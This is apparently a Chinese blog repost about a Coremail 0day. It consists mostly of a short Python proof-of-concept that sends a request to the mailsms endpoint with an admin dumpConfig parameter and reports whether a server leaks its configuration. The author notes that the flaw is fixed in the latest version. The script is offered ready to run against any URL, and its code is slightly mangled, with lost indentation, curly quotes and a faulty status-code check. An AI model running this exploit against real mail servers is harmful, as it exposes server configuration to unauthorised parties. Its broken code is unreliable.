广告区

广告区


本站消息

站长简介/公众号

关注本站官方公众号:程序员总部,领取三大福利!
福利一:python和前端辅导
福利二:进程序员交流微信群,专属于程序员的圈子
福利三:领取全套零基础视频教程(python,java,前端,php)

  价值13000svip视频教程,python大神匠心打造,零基础python开发工程师视频教程全套,基础+进阶+项目实战,包含课件和源码

  出租广告位,需要合作请联系站长

+关注
已关注

分类  

暂无分类

标签  

暂无标签

日期归档  

2021-08(2)

2021-09(9)

关于coremail的0day

发布于2019-08-07 12:29     阅读(353)     评论(0)     点赞(1)     收藏(0)



#-- Coding: utf-8 --
#Author: Vulkey_Chen
#Email: gh0stkey@hi-ourlife.com
#Website: www.hi-ourlife.com
#About: mailsms config dump PoC

import requests,sys

def mailsmsPoC(url):
url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/”
r = requests.get(url)
if (r.status_code != ‘404’) and ("/home/coremail" in r.text):
print “mailsms is vulnerable: {0}”.format(url)
else:
print “mailsms is safe!”

if name == ‘main’:
try:
mailsmsPoC(sys.argv[1])
except:
print “usage: python poc.py http://hi-ourlife.com/

最新版本已修复 我只是记一下脚本







所属网站分类: 技术文章 > 博客

作者:美达

链接:https://www.pythonheidong.com/blog/article/10802/06512b64eb8105fc2b9a/

来源:python黑洞网

任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任

1 0
收藏该文
已收藏

评论内容:(最多支持255个字符)